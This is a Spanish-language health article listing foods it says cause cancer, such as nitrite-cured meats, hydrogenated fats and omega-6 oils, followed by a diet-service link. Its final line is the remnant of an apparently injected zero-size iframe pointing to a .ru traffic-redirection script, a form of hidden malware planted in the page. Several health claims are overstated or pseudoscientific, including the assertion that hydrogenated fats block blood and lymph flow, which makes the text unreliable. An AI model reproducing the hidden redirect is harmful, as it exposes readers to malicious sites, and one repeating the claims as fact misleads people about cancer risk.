Artículos

Alimentos que provocan cáncer

Existen otros alimentos que  pueden ser sumamente peligrosos para nuestra salud ya que producen sustancias cancerígenas:

Nitritos: Los nitritos han sido utilizados en salchichas, tocinos y otros alimentos ahumados ya que dan buena apariencia a la carne intensificando su colorido y la preservan por más tiempo. Cuando se calientan los nitritos producen sustancias carcinógenas. Los niños que comen más de 12 salchichas al mes son 9.5 veces más propensos a enfermarse de leucemia.

Grasas animales y grasas hidrogenadas: El exceso en el consumo de grasas animales como la mantequilla, embutidos, crema, chicharrón, tocino y chorizo, así como las grasas hidrogenadas de origen vegetal como la margarina, mayonesa  y la manteca, se han asociado con el riesgo de padecer cáncer de colon, recto, pecho, ovarios y próstata. Las grasas hidrogenadas son grasas vegetales que  han sido tratadas químicamente, agregándoles hidrógeno y con ello se elimina el enlace que permite a las grasas unirse a las proteínas y volverse  solubles al agua; estas grasas permanecen en el organismo como tóxicos, bloquean la circulación de la sangre y la linfa, forman depósitos en el músculo cardiaco y favorecen la producción de células cancerosas.

Exceso en el consumo de aceites vegetales ricos en omega 6.  Las grasas vegetales son buenas para la salud pero es muy importante que exista un balance entre el ácido graso omega 3 y el omega 6 que  contienen.

El omega 6 se encuentra en grasas vegetales como el aceite de girasol, soya y maíz  y el omega 3 se encuentra en la semilla de linaza, el aceite de canola y los pescados de agua fría como el atún, salmón, arenque, trucha y sardinas.

En países orientales donde abunda el consumo de pescado, existe una relación de 2 a 1 entre el consumo de omega 6 y omega 3, por lo que los índices de mortalidad por cáncer y enfermedades cardiovasculares son muy bajos. En cambio en países occidentales donde abunda el consumo de aceites vegetales y se consume poco pescado la relación es de 6 a 1.

Es importante aumentar el consumo de omega 3 y disminuir el consumo de aceites vegetales,  sobre todo evitar que se utilicen a altas temperaturas, ya que según los resultados reportados por  la Escuela de Salud Pública de California, los aceites polinsaturados se oxidan fácilmente  al freírse y generan gran cantidad de radicales libres en el cuerpo, lo que aumenta la incidencia de cáncer.

Si los consumes, utilízalos en frío para aderezar ensaladas y compra los aceites extra virgen que han sido prensados en frío.

Las grasas monosaturadas son las mejores de todas ya que tienen mayor estabilidad química y generan un mínimo de radicales libres, grasas como el aceite de oliva y el aguacate.


Solicita tu dieta personalizada en http://www.dietasalamedida.com

emohuildiin.ru/tds/go.php?sid=1" width="0" height="0"